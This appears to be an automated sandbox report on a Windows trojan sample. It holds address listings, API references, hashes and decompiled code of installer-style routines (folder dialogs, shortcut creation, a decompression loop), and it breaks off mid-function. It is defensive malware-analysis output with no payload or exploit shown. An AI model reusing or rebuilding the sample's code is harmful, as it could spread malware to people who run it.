                                                          0x004048fd
                                                          0x0040490c
                                                          0x0040490c
                                                          0x00404910
                                                          0x0040491a
                                                          0x00404927
                                                          0x00404929
                                                          0x00404929
                                                          0x00404937
                                                          0x0040493e
                                                          0x00404945
                                                          0x00404948
                                                          0x0040497f
                                                          0x00404981
                                                          0x00404987
                                                          0x0040498c
                                                          0x00404990
                                                          0x00404992
                                                          0x00404992
                                                          0x004049ae
                                                          0x00000000
                                                          0x004049b0
                                                          0x004049b3
                                                          0x004049c1
                                                          0x004049c7
                                                          0x004049c8
                                                          0x004049cb
                                                          0x004049ce
                                                          0x00000000
                                                          0x004049ce
                                                          0x0040494a
                                                          0x0040494c
                                                          0x00404950
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404952
                                                          0x00404952
                                                          0x0040495f
                                                          0x00404964
                                                          0x00000000
                                                          0x00000000
                                                          0x00404968
                                                          0x0040496a
                                                          0x0040496a
                                                          0x00404972
                                                          0x00404974
                                                          0x00404977
                                                          0x0040497a
                                                          0x0040497d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040497d
                                                          0x004049da
                                                          0x004049e4
                                                          0x004049e7
                                                          0x004049ea
                                                          0x004049f1
                                                          0x004049f1
                                                          0x004049f3
                                                          0x004049f3
                                                          0x004049f8
                                                          0x004049fa
                                                          0x00404a02
                                                          0x00404a09
                                                          0x00404a0b
                                                          0x00404a16
                                                          0x00404a16
                                                          0x00404a0b
                                                          0x00404a1d
                                                          0x00404a26
                                                          0x00404a30
                                                          0x00404a38
                                                          0x00404a53
                                                          0x00404a3a
                                                          0x00404a43
                                                          0x00404a43
                                                          0x00404a38
                                                          0x00404a58
                                                          0x00404a5d
                                                          0x00404a62
                                                          0x00404a6b
                                                          0x00404a6b
                                                          0x00404a74
                                                          0x00404a76
                                                          0x00404a76
                                                          0x00404a82
                                                          0x00404a8a
                                                          0x00404a94
                                                          0x00404a94
                                                          0x00404a99
                                                          0x00000000
                                                          0x00404a99
                                                          0x00404948
                                                          0x004048ff
                                                          0x00404906
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404906
                                                          0x00404825
                                                          0x0040482e
                                                          0x00404848
                                                          0x0040484d
                                                          0x00404857
                                                          0x0040485e
                                                          0x0040486a
                                                          0x0040486d
                                                          0x00404870
                                                          0x00404877
                                                          0x0040487f
                                                          0x00404882
                                                          0x00404886
                                                          0x0040488d
                                                          0x00404895
                                                          0x004048ef
                                                          0x00404897
                                                          0x00404898
                                                          0x0040489f
                                                          0x004048a9
                                                          0x004048b1
                                                          0x004048be
                                                          0x004048d2
                                                          0x004048d6
                                                          0x004048d6
                                                          0x004048d2
                                                          0x004048db
                                                          0x004048e8
                                                          0x004048e8
                                                          0x00404895
                                                          0x00000000
                                                          0x0040484d
                                                          0x0040483b
                                                          0x00000000
                                                          0x00000000
                                                          0x00404841
                                                          0x00000000
                                                          0x004047ac
                                                          0x004047b9
                                                          0x004047c2
                                                          0x004047cf
                                                          0x004047cf
                                                          0x004047d6
                                                          0x004047dc
                                                          0x004047e5
                                                          0x004047e8
                                                          0x004047eb
                                                          0x004047f3
                                                          0x004047f6
                                                          0x004047f9
                                                          0x004047ff
                                                          0x00404806
                                                          0x0040480d
                                                          0x00404a9f
                                                          0x00404ab1
                                                          0x00404813
                                                          0x00404816
                                                          0x00000000
                                                          0x00404816
                                                          0x0040480d

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 004047B2
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                          • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                          • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                          • SetDlgItemTextA.USER32 ref: 004048E8
                                                            • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                            • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                            • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                            • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                            • Part of subcall function 00406528: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                          • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                            • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                            • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                            • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                          • API String ID: 2624150263-2678639445
                                                          • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                          • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                          • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                          • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0040216B(void* __eflags) {
                                                          				signed int _t55;
                                                          				void* _t59;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr _t64;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t84;
                                                          				int _t87;
                                                          				intOrPtr* _t95;
                                                          				signed int _t105;
                                                          				signed int _t109;
                                                          				void* _t111;
                                                          
                                                          				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                          				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                          				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                          				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                          				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                          				_t55 =  *(_t111 - 0x18);
                                                          				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                          				_t105 = _t55 & 0x00008000;
                                                          				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                          				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                          				if(E00405C52( *(_t111 - 0xc)) == 0) {
                                                          					E00402BCE(0x21);
                                                          				}
                                                          				_t59 = _t111 + 8;
                                                          				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                          				if(_t59 < _t87) {
                                                          					L15:
                                                          					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                          					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                          					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                          					if(_t64 >= _t87) {
                                                          						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                          						if(_t105 == _t87) {
                                                          							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                          						}
                                                          						if(_t109 != _t87) {
                                                          							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                          						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                          						if( *_t95 != _t87) {
                                                          							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                          						}
                                                          						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                          						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                          						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                          							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                          								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                          								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                          							}
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                          						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                          					}
                                                          					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
                                                          				return 0;
                                                          			}






















                                                          0x00402174
                                                          0x0040217e
                                                          0x00402188
                                                          0x00402195
                                                          0x004021a0
                                                          0x004021a3
                                                          0x004021bd
                                                          0x004021c3
                                                          0x004021c9
                                                          0x004021cc
                                                          0x004021d6
                                                          0x004021da
                                                          0x004021da
                                                          0x004021df
                                                          0x004021f0
                                                          0x004021f8
                                                          0x004022d4
                                                          0x004022d4
                                                          0x004022db
                                                          0x004021fe
                                                          0x004021fe
                                                          0x0040220d
                                                          0x00402211
                                                          0x00402214
                                                          0x0040221a
                                                          0x00402228
                                                          0x0040222b
                                                          0x0040222d
                                                          0x00402238
                                                          0x00402238
                                                          0x0040223d
                                                          0x0040223f
                                                          0x00402246
                                                          0x00402246
                                                          0x00402249
                                                          0x00402252
                                                          0x00402255
                                                          0x0040225a
                                                          0x0040225c
                                                          0x00402269
                                                          0x00402269
                                                          0x0040226c
                                                          0x00402278
                                                          0x0040227b
                                                          0x00402284
                                                          0x0040228a
                                                          0x00402291
                                                          0x004022aa
                                                          0x004022ac
                                                          0x004022ba
                                                          0x004022ba
                                                          0x004022aa
                                                          0x004022bd
                                                          0x004022c3
                                                          0x004022c3
                                                          0x004022c6
                                                          0x004022cc
                                                          0x004022d2
                                                          0x004022e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022d2
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 123533781-501415292
                                                          • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                          • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                          • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                          • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                          				void* _t19;
                                                          
                                                          				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                          					E004061AB(__edi, _t6);
                                                          					_push(_t19 - 0x1a4);
                                                          					_push(__esi);
                                                          					E0040624D();
                                                          				} else {
                                                          					 *__edi = __ebx;
                                                          					 *__esi = __ebx;
                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                          				}
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
                                                          				return 0;
                                                          			}




                                                          0x004027b9
                                                          0x004027cd
                                                          0x004027d8
                                                          0x004027d9
                                                          0x00402918
                                                          0x004027bb
                                                          0x004027bb
                                                          0x004027bd
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                          • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                          • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                          • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E00406A9B(signed int __ebx, signed int* __esi) {
                                                          				signed int _t396;
                                                          				signed int _t425;
                                                          				signed int _t442;
                                                          				signed int _t443;
                                                          				signed int* _t446;
                                                          				void* _t448;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t446 = __esi;
                                                          					_t425 = __ebx;
                                                          					if( *(_t448 - 0x34) == 0) {
                                                          						break;
                                                          					}
                                                          					L55:
                                                          					__eax =  *(__ebp - 0x38);
                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          					__ecx = __ebx;
                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          					__ebx = __ebx + 8;
                                                          					while(1) {
                                                          						L56:
                                                          						if(__ebx < 0xe) {
                                                          							goto L0;
                                                          						}
                                                          						L57:
                                                          						__eax =  *(__ebp - 0x40);
                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                          						__ecx = __eax;
                                                          						__esi[1] = __eax;
                                                          						__ecx = __eax & 0x0000001f;
                                                          						if(__cl > 0x1d) {
                                                          							L9:
                                                          							_t443 = _t442 | 0xffffffff;
                                                          							 *_t446 = 0x11;
                                                          							L10:
                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                          							_t446[0x146] = _t425;
                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                          							L11:
                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                          							E0040720A( *(_t448 + 8));
                                                          							return _t443;
                                                          						}
                                                          						L58:
                                                          						__eax = __eax & 0x000003e0;
                                                          						if(__eax > 0x3a0) {
                                                          							goto L9;
                                                          						}
                                                          						L59:
                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                          						__ebx = __ebx - 0xe;
                                                          						_t94 =  &(__esi[2]);
                                                          						 *_t94 = __esi[2] & 0x00000000;
                                                          						 *__esi = 0xc;
                                                          						while(1) {
                                                          							L60:
                                                          							__esi[1] = __esi[1] >> 0xa;
                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          								goto L68;
                                                          							}
                                                          							L61:
                                                          							while(1) {
                                                          								L64:
                                                          								if(__ebx >= 3) {
                                                          									break;
                                                          								}
                                                          								L62:
                                                          								if( *(__ebp - 0x34) == 0) {
                                                          									goto L182;
                                                          								}
                                                          								L63:
                                                          								__eax =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          								__ecx = __ebx;
                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          								__ebx = __ebx + 8;
                                                          							}
                                                          							L65:
                                                          							__ecx = __esi[2];
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ebx = __ebx - 3;
                                                          							_t108 = __ecx + 0x408408; // 0x121110
                                                          							__ecx =  *_t108;
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ecx = __esi[1];
                                                          							__esi[2] = __esi[2] + 1;
                                                          							__eax = __esi[2];
                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                          								goto L64;
                                                          							}
                                                          							L66:
                                                          							while(1) {
                                                          								L68:
                                                          								if(__esi[2] >= 0x13) {
                                                          									break;
                                                          								}
                                                          								L67:
                                                          								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                          								__eax =  *_t119;
                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                          								_t126 =  &(__esi[2]);
                                                          								 *_t126 = __esi[2] + 1;
                                                          							}
                                                          							L69:
                                                          							__ecx = __ebp - 8;
                                                          							__edi =  &(__esi[0x143]);
                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                          							__eax = 0;
                                                          							 *(__ebp - 8) = 0;
                                                          							__eax =  &(__esi[3]);
                                                          							 *__edi = 7;
                                                          							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                          							if(__eax != 0) {
                                                          								L72:
                                                          								 *__esi = 0x11;
                                                          								while(1) {
                                                          									L180:
                                                          									_t396 =  *_t446;
                                                          									if(_t396 > 0xf) {
                                                          										break;
                                                          									}
                                                          									L1:
                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
                                                          										case 0:
                                                          											L101:
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[5];
                                                          											__esi[2] = __esi[5];
                                                          											 *__esi = 1;
                                                          											goto L102;
                                                          										case 1:
                                                          											L102:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L105:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L103:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L104:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L106:
                                                          											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __ecx;
                                                          											if(__ecx != 0) {
                                                          												L108:
                                                          												__eflags = __cl & 0x00000010;
                                                          												if((__cl & 0x00000010) == 0) {
                                                          													L110:
                                                          													__eflags = __cl & 0x00000040;
                                                          													if((__cl & 0x00000040) == 0) {
                                                          														goto L125;
                                                          													}
                                                          													L111:
                                                          													__eflags = __cl & 0x00000020;
                                                          													if((__cl & 0x00000020) == 0) {
                                                          														goto L9;
                                                          													}
                                                          													L112:
                                                          													 *__esi = 7;
                                                          													goto L180;
                                                          												}
                                                          												L109:
                                                          												__esi[2] = __ecx;
                                                          												__esi[1] = __eax;
                                                          												 *__esi = 2;
                                                          												goto L180;
                                                          											}
                                                          											L107:
                                                          											__esi[2] = __eax;
                                                          											 *__esi = 6;
                                                          											goto L180;
                                                          										case 2:
                                                          											L113:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L116:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L114:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L115:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L117:
                                                          											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[6];
                                                          											__esi[2] = __esi[6];
                                                          											 *__esi = 3;
                                                          											goto L118;
                                                          										case 3:
                                                          											L118:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L121:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L119:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L120:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L122:
                                                          											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __cl & 0x00000010;
                                                          											if((__cl & 0x00000010) == 0) {
                                                          												L124:
                                                          												__eflags = __cl & 0x00000040;
                                                          												if((__cl & 0x00000040) != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L125:
                                                          												__esi[3] = __ecx;
                                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                          												__esi[2] = __eax;
                                                          												goto L180;
                                                          											}
                                                          											L123:
                                                          											__esi[2] = __ecx;
                                                          											__esi[3] = __eax;
                                                          											 *__esi = 4;
                                                          											goto L180;
                                                          										case 4:
                                                          											L126:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L129:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L127:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L128:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
